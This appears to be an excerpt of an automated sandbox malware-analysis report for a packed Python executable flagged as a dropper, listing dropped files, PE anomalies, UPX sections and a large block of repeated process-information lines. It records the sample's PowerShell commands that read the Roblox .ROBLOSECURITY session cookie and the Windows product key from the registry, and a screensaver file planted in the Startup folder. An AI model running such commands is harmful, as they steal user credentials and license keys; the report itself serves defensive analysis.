              Source: Binary string: D:\a\1\b\bin\amd64\select.pdb source: SecuriteInfo.com.Python.Muldrop.18.23042.15901.exe, 00000002.00000002.1776891927.00007FF8F6DA1000.00000040.00000001.01000000.0000000D.sdmp
              Source: Binary string: D:\a\1\b\bin\amd64\_ctypes.pdb source: SecuriteInfo.com.Python.Muldrop.18.23042.15901.exe, SecuriteInfo.com.Python.Muldrop.18.23042.15901.exe, 00000002.00000002.1773840617.00007FF8E75B1000.00000040.00000001.01000000.00000006.sdmp
              Source: Binary string: D:\a\1\b\bin\amd64\_hashlib.pdb source: SecuriteInfo.com.Python.Muldrop.18.23042.15901.exe, 00000002.00000002.1775280182.00007FF8F0941000.00000040.00000001.01000000.00000011.sdmp
              Source: Binary string: D:\a\1\b\bin\amd64\_lzma.pdbNN source: SecuriteInfo.com.Python.Muldrop.18.23042.15901.exe, 00000002.00000002.1773557891.00007FF8E755C000.00000040.00000001.01000000.00000008.sdmp
              Source: Binary string: D:\a\1\b\bin\amd64\_queue.pdb source: SecuriteInfo.com.Python.Muldrop.18.23042.15901.exe, 00000002.00000002.1776711949.00007FF8F5851000.00000040.00000001.01000000.00000012.sdmp
              Source: Binary string: D:\a\1\b\bin\amd64\_lzma.pdb source: SecuriteInfo.com.Python.Muldrop.18.23042.15901.exe, 00000002.00000002.1773557891.00007FF8E755C000.00000040.00000001.01000000.00000008.sdmp
              Source: Binary string: D:\a\1\b\bin\amd64\_bz2.pdb source: SecuriteInfo.com.Python.Muldrop.18.23042.15901.exe, 00000002.00000002.1776445085.00007FF8F1DF1000.00000040.00000001.01000000.00000009.sdmp
              Source: Binary string: D:\a\1\b\bin\amd64\_socket.pdb source: SecuriteInfo.com.Python.Muldrop.18.23042.15901.exe, 00000002.00000002.1775912815.00007FF8F0D01000.00000040.00000001.01000000.0000000C.sdmp
              Source: Binary string: D:\a\1\b\bin\amd64\_sqlite3.pdb source: SecuriteInfo.com.Python.Muldrop.18.23042.15901.exe, SecuriteInfo.com.Python.Muldrop.18.23042.15901.exe, 00000002.00000002.1773292284.00007FF8E7511000.00000040.00000001.01000000.0000000A.sdmp
              Source: Binary string: D:\a\1\b\bin\amd64\_ssl.pdb source: SecuriteInfo.com.Python.Muldrop.18.23042.15901.exe, SecuriteInfo.com.Python.Muldrop.18.23042.15901.exe, 00000002.00000002.1772235361.00007FF8E7361000.00000040.00000001.01000000.0000000E.sdmp
              Source: SecuriteInfo.com.Python.Muldrop.18.23042.15901.exe | Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
              Source: SecuriteInfo.com.Python.Muldrop.18.23042.15901.exe | Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
              Source: SecuriteInfo.com.Python.Muldrop.18.23042.15901.exe | Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
              Source: SecuriteInfo.com.Python.Muldrop.18.23042.15901.exe | Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
              Source: SecuriteInfo.com.Python.Muldrop.18.23042.15901.exe | Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata

              Data Obfuscation

              Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
              Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
              Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER
              Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name BackupProductKeyDefault
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\c3m2uwl3\c3m2uwl3.cmdline"
              Source: libcrypto-1_1.dll.0.dr | Static PE information: real checksum: 0x0 should be: 0x124d75
              Source: _ctypes.pyd.0.dr | Static PE information: real checksum: 0x0 should be: 0x19e1b
              Source: unicodedata.pyd.0.dr | Static PE information: real checksum: 0x0 should be: 0x4a227
              Source: _bz2.pyd.0.dr | Static PE information: real checksum: 0x0 should be: 0x1784a
              Source: libffi-8.dll.0.dr | Static PE information: real checksum: 0x0 should be: 0xa1d1
              Source: _ssl.pyd.0.dr | Static PE information: real checksum: 0x0 should be: 0x17418
              Source: sqlite3.dll.0.dr | Static PE information: real checksum: 0x0 should be: 0x9ff17
              Source: libssl-1_1.dll.0.dr | Static PE information: real checksum: 0x0 should be: 0x349c6
              Source: SecuriteInfo.com.Python.Muldrop.18.23042.15901.exe | Static PE information: real checksum: 0x6f5100 should be: 0x6f6e8e
              Source: _queue.pyd.0.dr | Static PE information: real checksum: 0x0 should be: 0xc985
              Source: _socket.pyd.0.dr | Static PE information: real checksum: 0x0 should be: 0x15415
              Source: python311.dll.0.dr | Static PE information: real checksum: 0x0 should be: 0x1a7f3d
              Source: _decimal.pyd.0.dr | Static PE information: real checksum: 0x0 should be: 0x1f8c8
              Source: _hashlib.pyd.0.dr | Static PE information: real checksum: 0x0 should be: 0xa12c
              Source: select.pyd.0.dr | Static PE information: real checksum: 0x0 should be: 0x12345
              Source: _lzma.pyd.0.dr | Static PE information: real checksum: 0x0 should be: 0x23dc5
              Source: _sqlite3.pyd.0.dr | Static PE information: real checksum: 0x0 should be: 0x1deb7
              Source: c3m2uwl3.dll.49.dr | Static PE information: real checksum: 0x0 should be: 0xa11f
              Source: SecuriteInfo.com.Python.Muldrop.18.23042.15901.exe | Static PE information: section name: _RDATA
              Source: libffi-8.dll.0.dr | Static PE information: section name: UPX2
              Source: VCRUNTIME140.dll.0.dr | Static PE information: section name: _RDATA
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Python.Muldrop.18.23042.15901.exe | Code function: 2_2_00007FF8E754D418 push rsi; retf 2_2_00007FF8E754D419
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Python.Muldrop.18.23042.15901.exe | Code function: 2_2_00007FF8E754D390 push rsi; iretd 2_2_00007FF8E754D3A5
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Code function: 9_2_00007FF88697D2A5 pushad ; iretd 9_2_00007FF88697D2A6
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Code function: 9_2_00007FF886A98AAB push eax; iretd 9_2_00007FF886A98ABA
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Code function: 9_2_00007FF886A99DF8 push E95C6F79h; ret 9_2_00007FF886A99E79
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Code function: 45_2_00007FF886AB19D3 pushad ; ret 45_2_00007FF886AB19D9
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Code function: 45_2_00007FF886AB4203 push ebp; iretd 45_2_00007FF886AB4232
              Source: initial sample | Static PE information: section name: UPX0
              Source: initial sample | Static PE information: section name: UPX1
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Python.Muldrop.18.23042.15901.exe | File created: C:\Users\user\AppData\Local\Temp\_MEI76002\_ssl.pyd
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Python.Muldrop.18.23042.15901.exe | File created: C:\Users\user\AppData\Local\Temp\_MEI76002\rar.exe
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Python.Muldrop.18.23042.15901.exe | File created: C:\Users\user\AppData\Local\Temp\_MEI76002\_socket.pyd
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Python.Muldrop.18.23042.15901.exe | File created: C:\Users\user\AppData\Local\Temp\_MEI76002\_hashlib.pyd
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Python.Muldrop.18.23042.15901.exe | File created: C:\Users\user\AppData\Local\Temp\_MEI76002\libcrypto-1_1.dll
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Python.Muldrop.18.23042.15901.exe | File created: C:\Users\user\AppData\Local\Temp\_MEI76002\libffi-8.dll
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Python.Muldrop.18.23042.15901.exe | File created: C:\Users\user\AppData\Local\Temp\_MEI76002\_lzma.pyd
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe | File created: C:\Users\user\AppData\Local\Temp\c3m2uwl3\c3m2uwl3.dll
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Python.Muldrop.18.23042.15901.exe | File created: C:\Users\user\AppData\Local\Temp\_MEI76002\libssl-1_1.dll
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Python.Muldrop.18.23042.15901.exe | File created: C:\Users\user\AppData\Local\Temp\_MEI76002\_decimal.pyd
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Python.Muldrop.18.23042.15901.exe | File created: C:\Users\user\AppData\Local\Temp\_MEI76002\_queue.pyd
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Python.Muldrop.18.23042.15901.exe | File created: C:\Users\user\AppData\Local\Temp\_MEI76002\select.pyd
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Python.Muldrop.18.23042.15901.exe | File created: C:\Users\user\AppData\Local\Temp\_MEI76002\python311.dll
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Python.Muldrop.18.23042.15901.exe | File created: C:\Users\user\AppData\Local\Temp\_MEI76002\sqlite3.dll
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Python.Muldrop.18.23042.15901.exe | File created: C:\Users\user\AppData\Local\Temp\_MEI76002\_bz2.pyd
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Python.Muldrop.18.23042.15901.exe | File created: C:\Users\user\AppData\Local\Temp\_MEI76002\VCRUNTIME140.dll
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Python.Muldrop.18.23042.15901.exe | File created: C:\Users\user\AppData\Local\Temp\_MEI76002\_sqlite3.pyd
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Python.Muldrop.18.23042.15901.exe | File created: C:\Users\user\AppData\Local\Temp\_MEI76002\_ctypes.pyd
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Python.Muldrop.18.23042.15901.exe | File created: C:\Users\user\AppData\Local\Temp\_MEI76002\unicodedata.pyd
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Python.Muldrop.18.23042.15901.exe | File created: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ .scr

              Hooking and other Techniques for Hiding and Protection

              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Python.Muldrop.18.23042.15901.exe | Code function: 0_2_00007FF7B10F51E0 GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,0_2_00007FF7B10F51E0
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
